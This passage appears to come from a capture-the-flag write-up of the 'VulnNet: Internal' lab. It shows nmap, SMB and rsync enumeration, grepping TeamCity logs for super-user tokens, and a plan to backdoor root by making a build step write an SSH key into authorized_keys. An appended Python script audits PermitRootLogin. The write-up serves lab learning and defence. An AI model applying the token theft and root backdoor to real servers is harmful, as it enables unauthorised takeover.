```
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sun Nov 7 18:20:32 2021 -- 1 IP address (1 host up) scanned in 56.43 seconds
```
```
$ enum4linux-ng -A vulnnetinternal.thm
...
 ======================================================
|    OS Information via RPC for vulnnetinternal.thm    |
 ======================================================
[*] Enumerating via unauthenticated SMB session on 445/tcp
[+] Found OS information via SMB
[*] Enumerating via 'srvinfo'
[+] Found OS information via 'srvinfo'
[+] After merging OS information we have the following result:
OS: Linux/Unix (Samba 4.7.6-Ubuntu)
OS version: '6.1'
OS release: ''
OS build: '0'
Native OS: Windows 6.1
Native LAN manager: Samba 4.7.6-Ubuntu
Platform id: '500'
Server type: '0x809a03'
Server type string: Sv PrQ Unx NT SNT vulnnet-internal server (Samba, Ubuntu)
...
 =============================================
|    Shares via RPC on vulnnetinternal.thm    |
 =============================================
[*] Enumerating shares
[+] Found 3 share(s):
IPC$:
  comment: IPC Service (vulnnet-internal server (Samba, Ubuntu))
  type: IPC
print$:
  comment: Printer Drivers
  type: Disk
shares:
  comment: VulnNet Business Shares
  type: Disk
[*] Testing share IPC$
[-] Could not check share: STATUS_OBJECT_NAME_NOT_FOUND
[*] Testing share print$
[+] Mapping: DENIED, Listing: N/A
[*] Testing share shares
[+] Mapping: OK, Listing: OK
...
```
```
[+] IP: vulnnetinternal.thm:445	Name: unknown	Status: Guest session
        Disk        Permissions     Comment
        ----        -----------     -------
        print$      NO ACCESS       Printer Drivers
        shares      READ ONLY       VulnNet Business Shares
        IPC$        NO ACCESS       IPC Service (vulnnet-internal server (Samba, Ubuntu))
```
Let's open the available share with a capable SMB browser (in my case with dolphin):
```
$ nmap -sV --script "rsync-list-modules" -p 873 vulnnetinternal.thm
Starting Nmap 7.92 ( https://nmap.org ) at 2021-11-07 21:10 CET
Nmap scan report for vulnnetinternal.thm (10.10.241.8)
Host is up (0.023s latency).

PORT    STATE SERVICE VERSION
873/tcp open  rsync   (protocol version 31)
| rsync-list-modules:
|_  files          	Necessary home interaction

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 0.59 seconds
```
The token could be in the Catalina configuration, but that file is read-protected, so let's look in the logs instead.
```
sys-internal@vulnnet-internal:~$ grep -ri token /TeamCity/logs/ 2>/dev/null
/TeamCity/logs/catalina.out:[TeamCity] Super user authentication token: 8-EDITED-5 (use empty username with the token as the password to access the server)
/TeamCity/logs/catalina.out:[TeamCity] Super user authentication token: 8-EDITED-5 (use empty username with the token as the password to access the server)
/TeamCity/logs/catalina.out:[TeamCity] Super user authentication token: 3-EDITED-6 (use empty username with the token as the password to access the server)
/TeamCity/logs/catalina.out:[TeamCity] Super user authentication token: 5-EDITED-2 (use empty username with the token as the password to access the server)
/TeamCity/logs/catalina.out:[TeamCity] Super user authentication token: 3-EDITED-0 (use empty username with the token as the password to access the server)
/TeamCity/logs/catalina.out:[TeamCity] Super user authentication token: 3-EDITED-0 (use empty username with the token as the password to access the server)
```
Once authenticated, we can create a new project, add a build configuration,
and add a build step of type Command Line that runs a custom script.
To backdoor the server as root we can write our SSH key to root's authorized_keys.
This works because the default value of PermitRootLogin in sshd_config is
prohibit-password: root cannot log in with a password, but key-based authentication is still accepted.
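The PermitRootLogin default that the write-up relies on is easy to misjudge when auditing a host, because a commented-out directive in sshd_config is not a directive at all. The following Python script is an added example, not part of the original write-up: it computes the effective PermitRootLogin value for the global section of an sshd_config (first occurrence wins, `without-password` is the legacy spelling of `prohibit-password`, anything after a `Match` line is out of scope here, and a missing directive means the OpenSSH 7.0+ default `prohibit-password`), counts the entries in root's authorized_keys, and reports whether root is reachable by key. The sample configurations and the key file below are constructed for the example; the file paths in `main()` are the usual Debian/Ubuntu locations and are only read if present.

```python
"""Audit whether root can log in over SSH with a public key.

Added example, not the write-up's own code. Assumptions: OpenSSH 7.0+
defaults, global-section semantics only (Match blocks are not evaluated),
and standard sshd_config / authorized_keys file locations.
"""
import os
import re

# Legacy spelling accepted by sshd for the same setting.
_ALIASES = {"without-password": "prohibit-password"}

# Values under which a public key (with or without a forced command) lets root in.
_KEY_LOGIN_VALUES = {"yes", "prohibit-password", "forced-commands-only"}


def effective_permit_root_login(config_text: str) -> str:
    """Return the effective global PermitRootLogin value.

    sshd honours the first occurrence of a keyword; lines that are blank or
    start with '#' are not directives; keyword and argument may be separated
    by whitespace or a single '='. Directives after a Match line are
    conditional and are ignored here. No directive -> OpenSSH default.
    """
    for raw in config_text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        parts = re.split(r"[\s=]+", line, maxsplit=1)
        keyword = parts[0].lower()
        if keyword == "match":
            break  # remaining lines belong to Match blocks (out of scope)
        if keyword == "permitrootlogin" and len(parts) == 2:
            value = parts[1].strip().lower()
            return _ALIASES.get(value, value)
    return "prohibit-password"


def count_authorized_keys(authorized_keys_text: str) -> int:
    """Count key entries in authorized_keys content (blank and comment lines skipped)."""
    return sum(
        1 for line in authorized_keys_text.splitlines()
        if line.strip() and not line.lstrip().startswith("#")
    )


def audit_root_ssh(config_text: str, authorized_keys_text: str) -> dict:
    """Combine the sshd setting with the key file into a single verdict."""
    value = effective_permit_root_login(config_text)
    key_login = value in _KEY_LOGIN_VALUES
    keys = count_authorized_keys(authorized_keys_text)
    return {
        "permit_root_login": value,
        "root_password_login": value == "yes",
        "root_key_login": key_login,
        "root_authorized_keys": keys,
        "root_reachable_by_key": key_login and keys > 0,
    }


# Constructed samples: a stock Ubuntu-style file where the directive is only
# present as a comment, and a hardened file that disables root login globally.
SAMPLE_DEFAULT_CONFIG = """# This is the sshd server system-wide configuration file.
#PermitRootLogin prohibit-password
PasswordAuthentication yes
"""

SAMPLE_HARDENED_CONFIG = """PermitRootLogin no
Match User deploy
    PermitRootLogin yes
"""

# Constructed authorized_keys content (placeholder key material, one entry).
SAMPLE_AUTHORIZED_KEYS = """# keys added by the build pipeline
ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIPLACEHOLDERKEYMATERIALxxxxxxxxxxxxxxxxxx attacker@example
"""


def main() -> None:
    config_path = "/etc/ssh/sshd_config"          # assumed standard path
    keys_path = "/root/.ssh/authorized_keys"      # assumed standard path
    config = open(config_path).read() if os.path.exists(config_path) else SAMPLE_DEFAULT_CONFIG
    keys = open(keys_path).read() if os.access(keys_path, os.R_OK) else SAMPLE_AUTHORIZED_KEYS
    for name, val in audit_root_ssh(config, keys).items():
        print(f"{name}: {val}")


if __name__ == "__main__":
    main()
```

On a host where the directive is only present as the commented `#PermitRootLogin prohibit-password` line, the audit reports `root_key_login: True`, which is exactly the condition the write-up exploits; a non-empty `/root/.ssh/authorized_keys` on a box that never intentionally provisioned one is the thing to alert on.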